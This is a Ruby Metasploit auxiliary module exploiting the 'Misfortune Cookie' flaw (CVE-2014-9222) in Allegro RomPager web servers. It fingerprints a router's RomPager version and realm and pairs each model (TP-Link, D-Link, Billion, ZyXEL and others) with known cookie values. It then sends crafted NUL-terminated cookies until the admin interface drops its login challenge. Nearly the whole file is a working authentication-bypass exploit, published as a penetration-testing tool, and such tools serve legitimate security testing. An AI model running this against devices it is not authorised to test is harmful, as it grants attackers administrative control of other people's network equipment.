Path: blob/master/modules/auxiliary/admin/http/allegro_rompager_auth_bypass.rb
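##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

class MetasploitModule < Msf::Auxiliary
  include Msf::Exploit::Remote::HttpClient
  include Msf::Auxiliary::Report

  # RomPager releases strictly below this version are affected by CVE-2014-9222.
  FIXED_VERSION = '4.34'.freeze

  def initialize(info = {})
    super(
      update_info(
        info,
        'Name' => "Allegro Software RomPager 'Misfortune Cookie' (CVE-2014-9222) Authentication Bypass",
        'Description' => %q{
          This module exploits HTTP servers that appear to be vulnerable to the
          'Misfortune Cookie' vulnerability which affects Allegro Software
          Rompager versions before 4.34 and can allow attackers to authenticate
          to the HTTP service as an administrator without providing valid
          credentials.
        },
        'Author' => [
          'Jon Hart <jon_hart[at]rapid7.com>', # metasploit scanner module
          'Jan Trencansky <jan.trencansky[at]gmail.com>', # metasploit auxiliary admin module
          'Lior Oppenheim' # CVE-2014-9222
        ],
        'References' => [
          ['CVE', '2014-9222'],
          ['URL', 'https://web.archive.org/web/20191006135858/http://mis.fortunecook.ie/'],
          ['URL', 'https://web.archive.org/web/20190207102911/http://mis.fortunecook.ie/misfortune-cookie-suspected-vulnerable.pdf'], # list of likely vulnerable devices
          ['URL', 'https://web.archive.org/web/20190623150837/http://mis.fortunecook.ie/too-many-cooks-exploiting-tr069_tal-oppenheim_31c3.pdf'] # 31C3 presentation with POC
        ],
        'DisclosureDate' => '2014-12-17',
        'License' => MSF_LICENSE,
        'Notes' => {
          'Stability' => [CRASH_SAFE],
          'SideEffects' => [IOC_IN_LOGS],
          'Reliability' => []
        }
      )
    )

    register_options(
      [
        OptString.new('TARGETURI', [true, 'URI to test', '/']),
      ], Exploit::Remote::HttpClient
    )

    register_advanced_options(
      [
        Msf::OptBool.new('ForceAttempt', [ false, 'Force exploit attempt for all known cookies', false ]),
      ], Exploit::Remote::HttpClient
    )
  end

  # Extra request headers sent with every exploit attempt. The Referer is set
  # to the target URI itself so the request looks like an in-app navigation.
  def headers
    {
      'Referer' => full_uri
    }
  end

  # Known [cookie number, payload length] pairs per device, keyed by the realm
  # string the device advertises in its WWW-Authenticate header (that realm is
  # what check_response_fingerprint returns). Each pair is turned into a
  # cookie of the form C<number>=<'B' * length> by run.
  #
  # The :ALL entry is the de-duplicated union of every other entry and is only
  # consulted when the `ForceAttempt` advanced option is set.
  def devices_list
    known_devices = {
      :'AZ-D140W' =>
        {
          name: 'Azmoon', model: 'AZ-D140W', values: [
            [107367693, 13]
          ]
        },
      :'BiPAC 5102S' =>
        {
          name: 'Billion', model: 'BiPAC 5102S', values: [
            [107369694, 13]
          ]
        },
      :'BiPAC 5200' =>
        {
          name: 'Billion', model: 'BiPAC 5200', values: [
            [107369545, 9],
            [107371218, 21]
          ]
        },
      :'BiPAC 5200A' =>
        {
          name: 'Billion', model: 'BiPAC 5200A', values: [
            [107366366, 25],
            [107371453, 9]
          ]
        },
      :'BiPAC 5200GR4' =>
        {
          name: 'Billion', model: 'BiPAC 5200GR4', values: [
            [107367690, 21]
          ]
        },
      :'BiPAC 5200SRD' =>
        {
          name: 'Billion', model: 'BiPAC 5200SRD', values: [
            [107368270, 1],
            [107371378, 3],
            [107371218, 13]
          ]
        },
      :'DSL-2520U' =>
        {
          name: 'D-Link', model: 'DSL-2520U', values: [
            [107368902, 25]
          ]
        },
      :'DSL-2600U' =>
        {
          name: 'D-Link', model: 'DSL-2600U', values: [
            [107366496, 13],
            [107360133, 20]
          ]
        },
      :'TD-8616' =>
        {
          name: 'TP-Link', model: 'TD-8616', values: [
            [107371483, 21],
            [107369790, 17],
            [107371161, 1],
            [107371426, 17],
            [107370211, 5],
          ]
        },
      :'TD-8817' =>
        {
          name: 'TP-Link', model: 'TD-8817', values: [
            [107369790, 17],
            [107369788, 1],
            [107369522, 25],
            [107369316, 21],
            [107369321, 9],
            [107351277, 20]
          ]
        },
      :'TD-8820' =>
        {
          name: 'TP-Link', model: 'TD-8820', values: [
            [107369768, 17]
          ]
        },
      :'TD-8840T' =>
        {
          name: 'TP-Link', model: 'TD-8840T', values: [
            [107369845, 5],
            [107369790, 17],
            [107369570, 1],
            [107369766, 1],
            [107369764, 5],
            [107369688, 17]
          ]
        },
      :'TD-W8101G' =>
        {
          name: 'TP-Link', model: 'TD-W8101G', values: [
            [107367772, 37],
            [107367808, 21],
            [107367751, 21],
            [107367749, 13],
            [107367765, 25],
            [107367052, 25],
            [107365835, 1]
          ]
        },
      :'TD-W8151N' =>
        {
          name: 'TP-Link', model: 'TD-W8151N', values: [
            [107353867, 24]
          ]
        },
      :'TD-W8901G' =>
        {
          name: 'TP-Link', model: 'TD-W8901G', values: [
            [107367787, 21],
            [107368013, 5],
            [107367854, 9],
            [107367751, 21],
            [107367749, 13],
            [107367765, 25],
            [107367682, 21],
            [107365835, 1],
            [107367052, 25]
          ]
        },
      :'TD-W8901GB' =>
        {
          name: 'TP-Link', model: 'TD-W8901GB', values: [
            [107367756, 13],
            [107369393, 21]
          ]
        },
      :'TD-W8901N' =>
        {
          name: 'TP-Link', model: 'TD-W8901N', values: [
            [107353880, 0]
          ]
        },
      :'TD-W8951ND' =>
        {
          name: 'TP-Link', model: 'TD-W8951ND', values: [
            [107369839, 25],
            [107369876, 13],
            [107366743, 21],
            [107364759, 25],
            [107364759, 13],
            [107364760, 21]
          ]
        },
      :'TD-W8961NB' =>
        {
          name: 'TP-Link', model: 'TD-W8961NB', values: [
            [107369844, 17],
            [107367629, 21],
            [107366421, 13]
          ]
        },
      :'TD-W8961ND' =>
        {
          name: 'TP-Link', model: 'TD-W8961ND', values: [
            [107369839, 25],
            [107369876, 13],
            [107364732, 25],
            [107364771, 37],
            [107364762, 29],
            [107353880, 0],
            [107353414, 36]
          ]
        },
      :'P-660R-T3 v3' => # This value works on devices with model P-660R-T3 v3 not P-660R-T3 v3s
        {
          name: 'ZyXEL', model: 'P-660R-T3', values: [
            [107369567, 21]
          ]
        },
      :'P-660RU-T3 v2' => # Couldn't verify this
        {
          name: 'ZyXEL', model: 'P-660R-T3', values: [
            [107369567, 21]
          ]
        },
      # Used when `ForceAttempt` === true. This must be the symbol :ALL (not a
      # bare constant) because the lookups below and in run use `[:ALL]`.
      :ALL =>
        { name: 'Unknown', model: 'Forced', values: [] }
    }
    # the brute-force entry is the de-duplicated union of every model's pairs
    known_devices[:ALL][:values] = known_devices.values.flat_map { |device| device[:values] }.uniq
    known_devices
  end

  # Inspect the fingerprint of the unauthenticated response.
  #
  # @param res [Rex::Proto::Http::Response, nil] response to the probe request
  # @param fallback_status [Exploit::CheckCode] value returned when the server
  #   does not look like a vulnerable RomPager
  # @return [String, Exploit::CheckCode] the realm string (the devices_list
  #   key) when the server reports RomPager < 4.34 and advertises a realm,
  #   otherwise +fallback_status+
  def check_response_fingerprint(res, fallback_status)
    fp = http_fingerprint(response: res)
    vprint_status("Fingerprint: #{fp}")
    # fp is nil when there was no usable response; nothing to match in that case
    return fallback_status unless fp && (match = fp.match(%r{RomPager/(?<version>[\d.]+)}))

    version = match[:version]
    vprint_status("#{peer} is RomPager #{version}")
    return fallback_status unless Rex::Version.new(version) < Rex::Version.new(FIXED_VERSION)

    # the realm is remote-controlled text; it is only ever used as a hash key
    realm = fp[/realm="(?<model>.+)"/, 'model']
    realm || fallback_status
  end

  # Probe the target, pick the cookie list matching its realm, and try each
  # cookie until one makes the server answer without demanding credentials.
  def run
    res = send_request_raw(
      'uri' => normalize_uri(target_uri.path.to_s),
      'method' => 'GET'
    )
    model = check_response_fingerprint(res, Exploit::CheckCode::Detected)
    if model == Exploit::CheckCode::Detected
      print_error('Unknown device')
      return
    end

    devices = devices_list[model.to_sym]
    devices = devices_list[:ALL] if devices.nil? && datastore['ForceAttempt']
    if devices.nil?
      print_error("No matching values for fingerprint #{model}")
      return
    end

    print_good("Detected device: #{devices[:name]} #{devices[:model]}")
    devices[:values].each do |number, length|
      # Misfortune Cookie PoC format: C<number>=<length x 'B'> followed by a
      # literal NUL byte (the "\x00" escape is intentional, keep it)
      cookie = "C#{number}=#{'B' * length}\x00"
      res = send_request_raw(
        'uri' => normalize_uri(target_uri.path.to_s),
        'method' => 'GET',
        'headers' => headers.merge('Cookie' => cookie)
      )
      # The probe was answered with an auth challenge (that is where the realm
      # came from); anything up to 302 means the challenge went away. A 3xx can
      # still be a bounce to a login page, hence the request to verify by hand.
      if res && res.code <= 302
        print_good('Good response, please check host, authentication should be disabled')
        print_status("Working cookie: C#{number}=#{'B' * length}")
        report_vuln(
          host: rhost,
          port: rport,
          proto: 'tcp',
          name: self.name,
          refs: references,
          info: "Authentication bypass with cookie C#{number} (#{length} bytes)"
        )
        break
      end
      print_error('Bad response')
    end
  end
end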